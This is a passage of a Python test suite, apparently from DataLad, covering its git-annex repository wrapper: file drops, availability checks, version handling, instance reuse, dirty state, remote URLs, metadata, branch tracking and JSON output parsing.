ar.drop([testkey], key=True)\n assert_false(ar.file_has_content(testfile))\n ok_(isinstance(result, list))\n eq_(len(result), 1)\n eq_(result[0]['command'], 'drop')\n eq_(result[0]['success'], True)\n eq_(result[0]['key'], testkey)\n\n # insufficient arguments:\n assert_raises(TypeError, ar.drop)\n assert_raises(InsufficientArgumentsError, ar.drop, [], options=[\"--jobs=5\"])\n assert_raises(InsufficientArgumentsError, ar.drop, [])\n\n # too much arguments:\n assert_raises(CommandError, ar.drop, ['.'], options=['--all'])\n\n (ar.pathobj / 'somefile.txt').write_text('this')\n ar.save()\n with assert_raises(CommandError) as e:\n ar.drop('somefile.txt')\n # CommandError has to pull the errors from the JSON record 'note'\n assert_in('necessary cop', str(e.value))\n\n with assert_raises(CommandError) as e:\n ar._call_annex_records(['fsck', '-N', '3'])\n # CommandError has to pull the errors from the JSON record 'error-messages'\n assert_in('1 of 3 trustworthy copies', str(e.value))\n\n\n@with_tree({\"a.txt\": \"a\", \"b.txt\": \"b\", \"c.py\": \"c\", \"d\": \"d\"})\ndef test_annex_get_annexed_files(path=None):\n repo = AnnexRepo(path)\n repo.add(\".\")\n repo.commit()\n eq_(set(repo.get_annexed_files()), {\"a.txt\", \"b.txt\", \"c.py\", \"d\"})\n\n repo.drop(\"a.txt\", options=[\"--force\"])\n eq_(set(repo.get_annexed_files()), {\"a.txt\", \"b.txt\", \"c.py\", \"d\"})\n eq_(set(repo.get_annexed_files(with_content_only=True)),\n {\"b.txt\", \"c.py\", \"d\"})\n\n eq_(set(repo.get_annexed_files(patterns=[\"*.txt\"])),\n {\"a.txt\", \"b.txt\"})\n eq_(set(repo.get_annexed_files(with_content_only=True,\n patterns=[\"*.txt\"])),\n {\"b.txt\"})\n\n eq_(set(repo.get_annexed_files(patterns=[\"*.txt\", \"*.py\"])),\n {\"a.txt\", \"b.txt\", \"c.py\"})\n\n eq_(set(repo.get_annexed_files()),\n set(repo.get_annexed_files(patterns=[\"*\"])))\n\n eq_(set(repo.get_annexed_files(with_content_only=True)),\n set(repo.get_annexed_files(with_content_only=True, patterns=[\"*\"])))\n\n\[email protected](\"batch\", [True, False])\n@with_tree(tree={\"test-annex.dat\": \"content\"})\n@serve_path_via_http()\n@with_tempfile()\n@with_tempfile()\ndef test_is_available(_=None, content_url=None, origpath=None, path=None, *,\n batch):\n\n fname = \"test-annex.dat\"\n content_url += \"/\" + fname\n origds = Dataset(origpath).create()\n origds.repo.add_url_to_file(fname, content_url)\n origds.save()\n origds.drop(fname)\n annex = clone(origpath, path).repo\n\n # bkw = {'batch': batch}\n if batch:\n is_available = partial(annex.is_available, batch=batch)\n else:\n is_available = annex.is_available\n\n key = annex.get_content_annexinfo([fname]).popitem()[1]['key']\n\n # explicit is to verify data type etc\n assert is_available(key, key=True) is True\n assert is_available(fname) is True\n\n # known remote but doesn't have it\n assert is_available(fname, remote=DEFAULT_REMOTE) is False\n\n # If the 'datalad' special remote is present, it will claim fname's URL.\n if DATALAD_SPECIAL_REMOTE in annex.get_remotes():\n remote = DATALAD_SPECIAL_REMOTE\n uuid = DATALAD_SPECIAL_REMOTES_UUIDS[DATALAD_SPECIAL_REMOTE]\n else:\n remote = \"web\"\n uuid = WEB_SPECIAL_REMOTE_UUID\n\n # it is on the 'web'\n assert is_available(fname, remote=remote) is True\n # not effective somehow :-/ may be the process already running or smth\n # with swallow_logs(), swallow_outputs(): # it will complain!\n assert is_available(fname, remote='unknown') is False\n assert_false(is_available(\"boguskey\", key=True))\n\n # remove url\n urls = annex.whereis(fname, output=\"full\").get(uuid, {}).get(\"urls\", [])\n\n assert(len(urls) == 1)\n eq_(urls,\n annex.whereis(key, key=True, output=\"full\")\n .get(uuid, {}).get(\"urls\"))\n annex.rm_url(fname, urls[0])\n\n assert is_available(key, key=True) is False\n assert is_available(fname) is False\n assert is_available(fname, remote=remote) is False\n\n\n@with_tempfile(mkdir=True)\ndef test_get_urls_none(path=None):\n ar = AnnexRepo(path, create=True)\n with open(opj(ar.path, \"afile\"), \"w\") as f:\n f.write(\"content\")\n eq_(ar.get_urls(\"afile\"), [])\n\n\n@xfail_buggy_annex_info\n@with_tempfile(mkdir=True)\ndef test_annex_add_no_dotfiles(path=None):\n ar = AnnexRepo(path, create=True)\n print(ar.path)\n assert_true(os.path.exists(ar.path))\n assert_false(ar.dirty)\n os.makedirs(opj(ar.path, '.datalad'))\n # we don't care about empty directories\n assert_false(ar.dirty)\n with open(opj(ar.path, '.datalad', 'somefile'), 'w') as f:\n f.write('some content')\n # make sure the repo is considered dirty now\n assert_true(ar.dirty) # TODO: has been more detailed assertion (untracked file)\n # now add to git, and it should work\n ar.add('.', git=True)\n # all in index\n assert_true(ar.dirty)\n # TODO: has been more specific:\n # assert_false(ar.repo.is_dirty(\n # index=False, working_tree=True, untracked_files=True, submodules=True))\n ar.commit(msg=\"some\")\n # all committed\n assert_false(ar.dirty)\n # not known to annex\n assert_false(ar.is_under_annex(opj(ar.path, '.datalad', 'somefile')))\n\n\n@with_tempfile\ndef test_annex_version_handling_at_min_version(path=None):\n with set_annex_version(AnnexRepo.GIT_ANNEX_MIN_VERSION):\n po = patch.object(AnnexRepo, '_check_git_annex_version',\n side_effect=AnnexRepo._check_git_annex_version)\n with po as cmpc:\n eq_(AnnexRepo.git_annex_version, None)\n ar1 = AnnexRepo(path, create=True)\n assert(ar1)\n eq_(AnnexRepo.git_annex_version, AnnexRepo.GIT_ANNEX_MIN_VERSION)\n eq_(cmpc.call_count, 1)\n # 2nd time must not be called\n try:\n # Note: Remove to cause creation of a new instance\n rmtree(path)\n except OSError:\n pass\n ar2 = AnnexRepo(path)\n assert(ar2)\n eq_(AnnexRepo.git_annex_version, AnnexRepo.GIT_ANNEX_MIN_VERSION)\n eq_(cmpc.call_count, 1)\n\n\n@with_tempfile\ndef test_annex_version_handling_bad_git_annex(path=None):\n with set_annex_version(None):\n eq_(AnnexRepo.git_annex_version, None)\n with assert_raises(MissingExternalDependency) as cme:\n AnnexRepo(path)\n linux_distribution_name = get_linux_distribution()[0]\n if linux_distribution_name == 'debian':\n assert_in(\"handbook.datalad.org\", str(cme.value))\n eq_(AnnexRepo.git_annex_version, None)\n\n with set_annex_version('6.20160505'):\n eq_(AnnexRepo.git_annex_version, None)\n try:\n # Note: Remove to cause creation of a new instance\n rmtree(path)\n except OSError:\n pass\n assert_raises(OutdatedExternalDependency, AnnexRepo, path)\n # and we don't assign it\n eq_(AnnexRepo.git_annex_version, None)\n # so we could still fail\n try:\n # Note: Remove to cause creation of a new instance\n rmtree(path)\n except OSError:\n pass\n assert_raises(OutdatedExternalDependency, AnnexRepo, path)\n\n\n@with_tempfile\n@with_tempfile\ndef test_get_description(path1=None, path2=None):\n annex1 = AnnexRepo(path1, create=True)\n # some content for git-annex branch\n create_tree(path1, {'1.dat': 'content'})\n annex1.add('1.dat', git=False)\n annex1.commit(\"msg\")\n annex1_description = annex1.get_description()\n assert_not_equal(annex1_description, path1)\n\n annex2 = AnnexRepo(path2, create=True, description='custom 2')\n eq_(annex2.get_description(), 'custom 2')\n # not yet known\n eq_(annex2.get_description(uuid=annex1.uuid), None)\n\n annex2.add_remote('annex1', path1)\n annex2.fetch('annex1')\n # it will match the remote name\n eq_(annex2.get_description(uuid=annex1.uuid),\n annex1_description + ' [annex1]')\n # add a little probe file to make sure it stays untracked\n create_tree(path1, {'probe': 'probe'})\n assert_not_in('probe', annex2.get_indexed_files())\n annex2.localsync('annex1')\n assert_not_in('probe', annex2.get_indexed_files())\n # but let's remove the remote\n annex2.remove_remote('annex1')\n eq_(annex2.get_description(uuid=annex1.uuid), annex1_description)\n\n\n@with_tempfile(mkdir=True)\n@with_tempfile(mkdir=True)\ndef test_AnnexRepo_flyweight(path1=None, path2=None):\n\n import sys\n\n repo1 = AnnexRepo(path1, create=True)\n assert_is_instance(repo1, AnnexRepo)\n\n # Due to issue 4862, we currently still require gc.collect() under unclear\n # circumstances to get rid of an exception traceback when creating in an\n # existing directory. That traceback references the respective function\n # frames which in turn reference the repo instance (they are methods).\n # Doesn't happen on all systems, though. Eventually we need to figure that\n # out.\n # However, still test for the refcount after gc.collect() to ensure we don't\n # introduce new circular references and make the issue worse!\n gc.collect()\n\n # As long as we don't reintroduce any circular references or produce\n # garbage during instantiation that isn't picked up immediately, `repo1`\n # should be the only counted reference to this instance.\n # Note, that sys.getrefcount reports its own argument and therefore one\n # reference too much.\n assert_equal(1, sys.getrefcount(repo1) - 1)\n\n # instantiate again:\n repo2 = AnnexRepo(path1, create=False)\n assert_is_instance(repo2, AnnexRepo)\n # the very same object:\n ok_(repo1 is repo2)\n\n # reference the same in an different way:\n with chpwd(path1):\n repo3 = AnnexRepo(relpath(path1, start=path2), create=False)\n assert_is_instance(repo3, AnnexRepo)\n # it's the same object:\n ok_(repo1 is repo3)\n\n # but path attribute is absolute, so they are still equal:\n ok_(repo1 == repo3)\n\n # Now, let's try to get a GitRepo instance from a path, we already have an\n # AnnexRepo of\n repo4 = GitRepo(path1)\n assert_is_instance(repo4, GitRepo)\n assert_not_is_instance(repo4, AnnexRepo)\n\n orig_id = id(repo1)\n\n # Be sure we have exactly one object in memory:\n assert_equal(1, len([o for o in gc.get_objects()\n if isinstance(o, AnnexRepo) and o.path == path1]))\n\n\n # But we have two GitRepos in memory (the AnnexRepo and repo4):\n assert_equal(2, len([o for o in gc.get_objects()\n if isinstance(o, GitRepo) and o.path == path1]))\n\n # deleting one reference doesn't change anything - we still get the same\n # thing:\n del repo1\n gc.collect() # TODO: see first comment above\n ok_(repo2 is not None)\n ok_(repo2 is repo3)\n ok_(repo2 == repo3)\n\n repo1 = AnnexRepo(path1)\n eq_(orig_id, id(repo1))\n\n del repo1\n del repo2\n\n # for testing that destroying the object calls close() on BatchedAnnex:\n class Dummy:\n def __init__(self, *args, **kwargs):\n self.close_called = False\n\n def close(self):\n self.close_called = True\n\n fake_batch = Dummy()\n\n # Killing last reference will lead to garbage collection which will call\n # AnnexRepo's finalizer:\n with patch.object(repo3._batched, 'close', fake_batch.close):\n with swallow_logs(new_level=1) as cml:\n del repo3\n gc.collect() # TODO: see first comment above\n cml.assert_logged(msg=\"Finalizer called on: AnnexRepo(%s)\" % path1,\n level=\"Level 1\",\n regex=False)\n # finalizer called close() on BatchedAnnex:\n assert_true(fake_batch.close_called)\n\n # Flyweight is gone:\n assert_not_in(path1, AnnexRepo._unique_instances.keys())\n\n # gc doesn't know any instance anymore:\n assert_equal([], [o for o in gc.get_objects()\n if isinstance(o, AnnexRepo) and o.path == path1])\n # GitRepo is unaffected:\n assert_equal(1, len([o for o in gc.get_objects()\n if isinstance(o, GitRepo) and o.path == path1]))\n\n # new object is created on re-request:\n repo1 = AnnexRepo(path1)\n assert_equal(1, len([o for o in gc.get_objects()\n if isinstance(o, AnnexRepo) and o.path == path1]))\n\n\n@with_tempfile\n@with_tempfile(mkdir=True)\n@with_tempfile\ndef test_AnnexRepo_get_toppath(repo=None, tempdir=None, repo2=None):\n AnnexRepo(repo, create=True)\n\n reporeal = str(Path(repo).resolve())\n eq_(AnnexRepo.get_toppath(repo, follow_up=False), reporeal)\n eq_(AnnexRepo.get_toppath(repo), repo)\n # Generate some nested directory\n AnnexRepo(repo2, create=True)\n repo2real = str(Path(repo2).resolve())\n nested = opj(repo2, \"d1\", \"d2\")\n os.makedirs(nested)\n eq_(AnnexRepo.get_toppath(nested, follow_up=False), repo2real)\n eq_(AnnexRepo.get_toppath(nested), repo2)\n # and if not under git, should return None\n eq_(AnnexRepo.get_toppath(tempdir), None)\n\n\ndef test_AnnexRepo_get_submodules():\n raise SkipTest(\"TODO\")\n\n\n@with_tempfile(mkdir=True)\ndef test_AnnexRepo_dirty(path=None):\n\n repo = AnnexRepo(path, create=True)\n ok_(not repo.dirty)\n\n # pure git operations:\n # untracked file\n with open(opj(path, 'file1.txt'), 'w') as f:\n f.write('whatever')\n ok_(repo.dirty)\n # staged file\n repo.add('file1.txt', git=True)\n ok_(repo.dirty)\n # clean again\n repo.commit(\"file1.txt added\")\n ok_(not repo.dirty)\n # modify to be the same\n with open(opj(path, 'file1.txt'), 'w') as f:\n f.write('whatever')\n ok_(not repo.dirty)\n # modified file\n with open(opj(path, 'file1.txt'), 'w') as f:\n f.write('something else')\n ok_(repo.dirty)\n # clean again\n repo.add('file1.txt', git=True)\n repo.commit(\"file1.txt modified\")\n ok_(not repo.dirty)\n\n # annex operations:\n # untracked file\n with open(opj(path, 'file2.txt'), 'w') as f:\n f.write('different content')\n ok_(repo.dirty)\n # annexed file\n repo.add('file2.txt', git=False)\n ok_(repo.dirty)\n # commit\n repo.commit(\"file2.txt annexed\")\n\n ok_(not repo.dirty)\n\n repo.unlock(\"file2.txt\")\n # Unlocking the file is seen as a modification when we're not already in an\n # adjusted branch (for this test, that would be the case if we're on a\n # crippled filesystem).\n ok_(repo.dirty ^ repo.is_managed_branch())\n repo.save()\n ok_(not repo.dirty)\n\n subm = AnnexRepo(repo.pathobj / \"subm\", create=True)\n (subm.pathobj / \"foo\").write_text(\"foo\")\n subm.save()\n ok_(repo.dirty)\n repo.save()\n assert_false(repo.dirty)\n maybe_adjust_repo(subm)\n assert_false(repo.dirty)\n\n\n@with_tempfile(mkdir=True)\ndef test_AnnexRepo_set_remote_url(path=None):\n\n ar = AnnexRepo(path, create=True)\n ar.add_remote('some', 'http://example.com/.git')\n assert_equal(ar.config['remote.some.url'],\n 'http://example.com/.git')\n assert_not_in('remote.some.annexurl', ar.config.keys())\n # change url:\n ar.set_remote_url('some', 'http://believe.it')\n assert_equal(ar.config['remote.some.url'],\n 'http://believe.it')\n assert_not_in('remote.some.annexurl', ar.config.keys())\n\n # set push url:\n ar.set_remote_url('some', 'ssh://whatever.ru', push=True)\n assert_equal(ar.config['remote.some.pushurl'],\n 'ssh://whatever.ru')\n assert_in('remote.some.annexurl', ar.config.keys())\n assert_equal(ar.config['remote.some.annexurl'],\n 'ssh://whatever.ru')\n\n\n@with_tempfile(mkdir=True)\ndef test_wanted(path=None):\n ar = AnnexRepo(path, create=True)\n eq_(ar.get_preferred_content('wanted'), None)\n # test samples with increasing \"trickiness\"\n for v in (\"standard\",\n \"include=*.nii.gz or include=*.nii\",\n \"exclude=archive/* and (include=*.dat or smallerthan=2b)\"\n ):\n ar.set_preferred_content('wanted', expr=v)\n eq_(ar.get_preferred_content('wanted'), v)\n # give it some file so clone/checkout works without hiccups\n create_tree(ar.path, {'1.dat': 'content'})\n ar.add('1.dat')\n ar.commit(msg=\"blah\")\n # make a clone and see if all cool there\n # intentionally clone as pure Git and do not annex init so to see if we\n # are ignoring crummy log msgs\n ar1_path = ar.path + '_1'\n GitRepo.clone(ar.path, ar1_path)\n ar1 = AnnexRepo(ar1_path, init=False)\n eq_(ar1.get_preferred_content('wanted'), None)\n eq_(ar1.get_preferred_content('wanted', DEFAULT_REMOTE), v)\n ar1.set_preferred_content('wanted', expr='standard')\n eq_(ar1.get_preferred_content('wanted'), 'standard')\n\n\n@with_tempfile(mkdir=True)\ndef test_AnnexRepo_metadata(path=None):\n # prelude\n obscure_name = get_most_obscure_supported_name()\n\n ar = AnnexRepo(path, create=True)\n create_tree(\n path,\n {\n 'up.dat': 'content',\n obscure_name: {\n obscure_name + '.dat': 'lowcontent'\n }\n })\n ar.add('.', git=False)\n ar.commit('content')\n assert_repo_status(path)\n # fugue\n # doesn't do anything if there is nothing to do\n ar.set_metadata('up.dat')\n eq_([], list(ar.get_metadata(None)))\n eq_([], list(ar.get_metadata('')))\n eq_([], list(ar.get_metadata([])))\n eq_({'up.dat': {}}, dict(ar.get_metadata('up.dat')))\n # basic invocation\n eq_(1, len(ar.set_metadata(\n 'up.dat',\n reset={'mike': 'awesome'},\n add={'tag': 'awesome'},\n remove={'tag': 'awesome'}, # cancels prev, just to use it\n init={'virgin': 'true'},\n purge=['nothere'])))\n # no timestamps by default\n md = dict(ar.get_metadata('up.dat'))\n deq_({'up.dat': {\n 'virgin': ['true'],\n 'mike': ['awesome']}},\n md)\n # matching timestamp entries for all keys\n md_ts = dict(ar.get_metadata('up.dat', timestamps=True))\n for k in md['up.dat']:\n assert_in('{}-lastchanged'.format(k), md_ts['up.dat'])\n assert_in('lastchanged', md_ts['up.dat'])\n # recursive needs a flag\n assert_raises(CommandError, ar.set_metadata, '.', purge=['virgin'])\n ar.set_metadata('.', purge=['virgin'], recursive=True)\n deq_({'up.dat': {\n 'mike': ['awesome']}},\n dict(ar.get_metadata('up.dat')))\n # Use trickier tags (spaces, =)\n ar.set_metadata('.', reset={'tag': 'one and= '}, purge=['mike'], recursive=True)\n playfile = opj(obscure_name, obscure_name + '.dat')\n target = {\n 'up.dat': {\n 'tag': ['one and= ']},\n playfile: {\n 'tag': ['one and= ']}}\n deq_(target, dict(ar.get_metadata('.')))\n for batch in (True, False):\n # no difference in reporting between modes\n deq_(target, dict(ar.get_metadata(['up.dat', playfile], batch=batch)))\n # incremental work like a set\n ar.set_metadata(playfile, add={'tag': 'one and= '})\n deq_(target, dict(ar.get_metadata('.')))\n ar.set_metadata(playfile, add={'tag': ' two'})\n # returned values are sorted\n eq_([' two', 'one and= '], dict(ar.get_metadata(playfile))[playfile]['tag'])\n # init honor prior values\n ar.set_metadata(playfile, init={'tag': 'three'})\n eq_([' two', 'one and= '], dict(ar.get_metadata(playfile))[playfile]['tag'])\n ar.set_metadata(playfile, remove={'tag': ' two'})\n deq_(target, dict(ar.get_metadata('.')))\n # remove non-existing doesn't error and doesn't change anything\n ar.set_metadata(playfile, remove={'ether': 'best'})\n deq_(target, dict(ar.get_metadata('.')))\n # add works without prior existence\n ar.set_metadata(playfile, add={'novel': 'best'})\n eq_(['best'], dict(ar.get_metadata(playfile))[playfile]['novel'])\n\n\n@with_tree(tree={'file.txt': 'content'})\n@serve_path_via_http()\n@with_tempfile\ndef test_AnnexRepo_addurl_batched_and_set_metadata(path=None, url=None, dest=None):\n ar = AnnexRepo(dest, create=True)\n fname = \"file.txt\"\n ar.add_url_to_file(fname, urljoin(url, fname), batch=True)\n ar.set_metadata(fname, init={\"number\": \"one\"})\n eq_([\"one\"], dict(ar.get_metadata(fname))[fname][\"number\"])\n\n\n@with_tempfile(mkdir=True)\ndef test_change_description(path=None):\n # prelude\n ar = AnnexRepo(path, create=True, description='some')\n eq_(ar.get_description(), 'some')\n # try change it\n ar = AnnexRepo(path, create=False, init=True, description='someother')\n # this doesn't cut the mustard, still old\n eq_(ar.get_description(), 'some')\n # need to resort to \"internal\" helper\n ar._init(description='someother')\n eq_(ar.get_description(), 'someother')\n\n\n@with_tempfile\n@with_tempfile\ndef test_AnnexRepo_get_corresponding_branch(src_path=None, path=None):\n src = AnnexRepo(src_path, create=True)\n (src.pathobj / 'test-annex.dat').write_text(\"content\")\n src.save('some')\n\n ar = AnnexRepo.clone(src_path, path)\n\n # we should be on the default branch.\n eq_(DEFAULT_BRANCH,\n ar.get_corresponding_branch() or ar.get_active_branch())\n\n # special case v6 adjusted branch is not provided by a dedicated build:\n ar.adjust()\n # as above, we still want to get the default branch, while being on\n # 'adjusted/<default branch>(unlocked)'\n eq_('adjusted/{}(unlocked)'.format(DEFAULT_BRANCH),\n ar.get_active_branch())\n eq_(DEFAULT_BRANCH, ar.get_corresponding_branch())\n\n\n@with_tempfile\n@with_tempfile\ndef test_AnnexRepo_get_tracking_branch(src_path=None, path=None):\n src = AnnexRepo(src_path, create=True)\n (src.pathobj / 'test-annex.dat').write_text(\"content\")\n src.save('some')\n\n ar = AnnexRepo.clone(src_path, path)\n\n # we want the relation to original branch, e.g. in v6+ adjusted branch\n eq_((DEFAULT_REMOTE, 'refs/heads/' + DEFAULT_BRANCH),\n ar.get_tracking_branch())\n\n\n@skip_if_adjusted_branch\n@with_tempfile\ndef test_AnnexRepo_is_managed_branch(path=None):\n ar = AnnexRepo(path, create=True)\n (ar.pathobj / 'test-annex.dat').write_text(\"content\")\n ar.save('some')\n\n ar.adjust()\n ok_(ar.is_managed_branch())\n\n\n@with_tempfile(mkdir=True)\ndef test_fake_is_not_special(path=None):\n ar = AnnexRepo(path, create=True)\n # doesn't exist -- we fail by default\n assert_raises(RemoteNotAvailableError, ar.is_special_annex_remote, \"fake\")\n assert_false(ar.is_special_annex_remote(\"fake\", check_if_known=False))\n\n\n@with_tree(tree={\"remote\": {}, \"main\": {}, \"special\": {}})\ndef test_is_special(path=None):\n rem = AnnexRepo(op.join(path, \"remote\"), create=True)\n dir_arg = \"directory={}\".format(op.join(path, \"special\"))\n rem.init_remote(\"imspecial\",\n [\"type=directory\", \"encryption=none\", dir_arg])\n ok_(rem.is_special_annex_remote(\"imspecial\"))\n\n ar = AnnexRepo.clone(rem.path, op.join(path, \"main\"))\n assert_false(ar.is_special_annex_remote(DEFAULT_REMOTE))\n\n assert_false(ar.is_special_annex_remote(\"imspecial\",\n check_if_known=False))\n ar.enable_remote(\"imspecial\", options=[dir_arg])\n ok_(ar.is_special_annex_remote(\"imspecial\"))\n\n # With a mis-configured remote, give warning and return false.\n ar.config.unset(f\"remote.{DEFAULT_REMOTE}.url\", scope=\"local\")\n with swallow_logs(new_level=logging.WARNING) as cml:\n assert_false(ar.is_special_annex_remote(DEFAULT_REMOTE))\n cml.assert_logged(msg=\".*no URL.*\", level=\"WARNING\", regex=True)\n\n\n@with_tempfile(mkdir=True)\ndef test_fake_dates(path=None):\n ar = AnnexRepo(path, create=True, fake_dates=True)\n timestamp = ar.config.obtain(\"datalad.fake-dates-start\") + 1\n # Commits from the \"git annex init\" call are one second ahead.\n for commit in ar.get_branch_commits_(\"git-annex\"):\n eq_(timestamp, int(ar.format_commit('%ct', commit)))\n assert_in(\"timestamp={}s\".format(timestamp),\n ar.call_git([\"cat-file\", \"blob\", \"git-annex:uuid.log\"], read_only=True))\n\n\n# to prevent regression\n# http://git-annex.branchable.com/bugs/v6_-_under_subdir__58___git_add___34__whines__34____44___git_commit___34__blows__34__/\n# It is disabled because is not per se relevant to DataLad since we do not\n# Since we invoke from the top of the repo, we do not hit it,\n# but thought to leave it around if we want to enforce/test system-wide git being\n# compatible with annex for v6 mode\n@with_tempfile(mkdir=True)\ndef _test_add_under_subdir(path):\n ar = AnnexRepo(path, create=True, version=6)\n gr = GitRepo(path) # \"Git\" view over the repository, so we force \"git add\"\n subdir = opj(path, 'sub')\n subfile = opj('sub', 'empty')\n # os.mkdir(subdir)\n create_tree(subdir, {'empty': ''})\n runner = Runner(cwd=subdir)\n with chpwd(subdir):\n runner.run(['git', 'add', 'empty']) # should add successfully\n # gr.commit('important') #\n runner.run(['git', 'commit', '-m', 'important'])\n ar.is_under_annex(subfile)\n\n\n# https://github.com/datalad/datalad/issues/2892\n@with_tempfile(mkdir=True)\ndef test_error_reporting(path=None):\n ar = AnnexRepo(path, create=True)\n res = ar.call_annex_records(['add'], files='gl\\\\orious BS')\n target = {\n 'command': 'add',\n # whole thing, despite space, properly quotes backslash\n 'file': 'gl\\\\orious BS',\n 'note': 'not found',\n 'success': False\n }\n assert len(res) >= 1\n if 'message-id' in res[0]:\n # new since ~ 10.20230407-99-gbe36e208c2\n target['message-id'] = 'FileNotFound'\n target['input'] = ['gl\\\\orious BS']\n target['error-messages'] = ['git-annex: gl\\\\orious BS not found']\n else:\n # our own produced record\n target['error-messages'] = ['File unknown to git']\n eq_(res, [target])\n\n\n@with_tree(tree={\n 'file1': \"content1\",\n 'dir1': {'file2': 'content2'},\n})\ndef test_annexjson_protocol(path=None):\n ar = AnnexRepo(path, create=True)\n ar.save()\n assert_repo_status(path)\n # first an orderly execution\n res = ar._call_annex(\n ['find', '.', '--json'],\n protocol=AnnexJsonProtocol)\n for k in ('stdout', 'stdout_json', 'stderr'):\n assert_in(k, res)\n orig_j = res['stdout_json']\n eq_(len(orig_j), 2)\n # not meant as an exhaustive check for output structure,\n # just some assurance that it is not totally alien\n ok_(all(j['file'] for j in orig_j))\n # no complaints, unless git-annex is triggered to run in debug mode\n if logging.getLogger('datalad.annex').getEffectiveLevel() > 8:\n eq_(res['stderr'], '')\n\n # Note: git-annex-find <non-existent-path> does not error with all annex\n # versions. Fixed in annex commit\n # ce91f10132805d11448896304821b0aa9c6d9845 (Feb 28, 2022).\n if '10.20220222' < external_versions['cmd:annex'] < '10.20220322':\n raise SkipTest(\"zero-exit annex-find bug\")\n\n # now the same, but with a forced error\n with assert_raises(CommandError) as e:\n ar._call_annex(['find', '.', 'error', '--json'],\n protocol=AnnexJsonProtocol)\n # normal operation is not impaired\n eq_(e.value.kwargs['stdout_json'], orig_j)\n # we get a clue what went wrong,\n # but reporting depends on config + version (default changed):\n msg = \"pathspec 'error' did not match\" if not dl_cfg.getbool(\n section=\"annex\", option=\"skipunknown\",\n # git-annex switched default for this config:\n default=bool(external_versions['cmd:annex'] < '10.20220222')) else \\\n \"error not found\"\n assert_in(msg, e.value.stderr)\n # there should be no errors reported in an individual records\n # hence also no pointless statement in the str()\n assert_not_in('errors from JSON records', str(e.value))\n\n\n@with_tempfile\ndef test_annexjson_protocol_long(path=None, *, caplog):\n records = [\n {\"k\": \"v\" * 20},\n # Value based off of\n # Lib.asyncio.unix_events._UnixReadPipeTransport.max_size.\n {\"k\": \"v\" * 256 * 1024},\n # and tiny ones in between should not be lost\n {\"k\": \"v\"},\n # even a much larger one - we should handle as well\n {\"k\": \"v\" * 256 * 1024 * 5},\n ]\n with open(path, 'w') as f:\n for record in records:\n print(\"print(%r);\" % json.dumps(record), file=f)\n runner = GitWitlessRunner()\n with caplog.at_level(logging.ERROR), \\\n swallow_logs(new_level=logging.ERROR):\n res = runner.run(\n [sys.executable, path],\n protocol=AnnexJsonProtocol\n )\n eq_(res['stdout'], '')\n eq_(res['stderr'], '')\n eq_(res['stdout_json'], records)\n\n\[email protected](\"print_opt\", ['', ', end=\"\"'])\n@with_tempfile\ndef test_annexjson_protocol_incorrect(path=None, *, print_opt, caplog):\n # Test that we still log some incorrectly formed JSON record\n bad_json = '{\"I\": \"am wrong,}'\n with open(path, 'w') as f:\n print(\"print(%r%s);\" % (bad_json, print_opt), file=f)\n runner = GitWitlessRunner()\n # caplog only to not cause memory error in case of heavy debugging\n # Unfortunately it lacks similar .assert_logged with a regex matching\n # to be just used instead\n with caplog.at_level(logging.ERROR), \\\n swallow_logs(new_level=logging.ERROR) as cml:\n res = runner.run(\n [sys.executable, path],\n protocol=AnnexJsonProtocol\n )\n cml.assert_logged(\n msg=\".*[rR]eceived undecodable JSON output\",\n level=\"ERROR\",\n regex=True)\n # only error logged and nothing returned\n eq_(res['stdout'], '')\n eq_(res['stderr'], '')\n eq_(res['stdout_json'], [])\n\n# see https://github.com/datalad/datalad/pull/5400 for troubleshooting\n# for stalling with unlock=False, and then with unlock=True it took >= 300 sec\n# https://github.com/datalad/datalad/pull/5433#issuecomment-784470028\n@skip_if(on_travis and on_nfs) # TODO. stalls\n# http://git-annex.branchable.com/bugs/cannot_commit___34__annex_add__34__ed_modified_file_which_switched_its_largefile_status_to_be_committed_to_git_now/#comment-bf70dd0071de1bfdae9fd4f736fd1ec\n# https://github.com/datalad/datalad/issues/1651\n@known_failure_githubci_win\[email protected](\"unlock\", [True, False])\n@with_tree(tree={\n '.gitattributes': \"** annex.largefiles=(largerthan=4b)\",\n 'alwaysbig': 'a'*10,\n 'willgetshort': 'b'*10,\n 'tobechanged-git': 'a',\n 'tobechanged-annex': 'a'*10,\n})\ndef test_commit_annex_commit_changed(path=None, *, unlock):\n # Here we test commit working correctly if file was just removed\n # (not unlocked), edited and committed back\n\n # TODO: an additional possible interaction to check/solidify - if files\n # first get unannexed (after being optionally unlocked first)\n unannex = False\n\n ar = AnnexRepo(path, create=True)\n ar.save(paths=[\".gitattributes\"], git=True)\n ar.save(\"initial commit\")\n assert_repo_status(path)\n # Now let's change all but commit only some\n files = [op.basename(p) for p in glob(op.join(path, '*'))]\n if unlock:\n ar.unlock(files)\n if unannex:\n ar.unannex(files)\n create_tree(\n path\n , {\n 'alwaysbig': 'a'*11,\n 'willgetshort': 'b',\n 'tobechanged-git': 'aa',\n 'tobechanged-annex': 'a'*11,\n 'untracked': 'unique'\n }\n , remove_existing=True\n )\n assert_repo_status(\n path\n , modified=files if not unannex else ['tobechanged-git']\n , untracked=['untracked'] if not unannex else\n # all but the one in git now\n ['alwaysbig', 'tobechanged-annex', 'untracked', 'willgetshort']\n )\n\n ar.save(\"message\", paths=['alwaysbig', 'willgetshort'])\n assert_repo_status(\n path\n , modified=['tobechanged-git', 'tobechanged-annex']\n , untracked=['untracked']\n )\n ok_file_under_git(path, 'alwaysbig', annexed=True)\n ok_file_under_git(path, 'willgetshort', annexed=False)\n\n ar.save(\"message2\", untracked='no') # commit all changed\n assert_repo_status(\n path\n , untracked=['untracked']\n )\n ok_file_under_git(path, 'tobechanged-git', annexed=False)\n ok_file_under_git(path, 'tobechanged-annex', annexed=True)\n\n\n_test_unannex_tree = {\n OBSCURE_FILENAME: 'content1',\n OBSCURE_FILENAME + \".dat\": 'content2',\n}\nif not on_windows and (\n external_versions['cmd:annex'] <= '10.20230407' or external_versions['cmd:annex'] >= '10.20230408'\n):\n # Only whenever we are not within the development versions of the 10.20230407\n # where we cannot do version comparison relibalye,\n # the case where we have entire filename within \"\"\n _test_unannex_tree[f'\"{OBSCURE_FILENAME}\"'] = 'content3'\n\n\n@with_tree(tree=_test_unannex_tree)\ndef test_unannex_etc(path=None):\n # Primarily to test if quote/unquote/not-quote'ing work for tricky\n # filenames. Ref: https://github.com/datalad/datalad/pull/7372\n repo = AnnexRepo(path)\n files = list(_test_unannex_tree)\n # here it is through json so kinda guaranteed to work but let's check too\n assert files == [x['file'] for x in repo.add(files)]\n assert sorted(files) == sorted(repo.get_annexed_files())\n assert files == repo.unannex(files)\n\n\n@slow 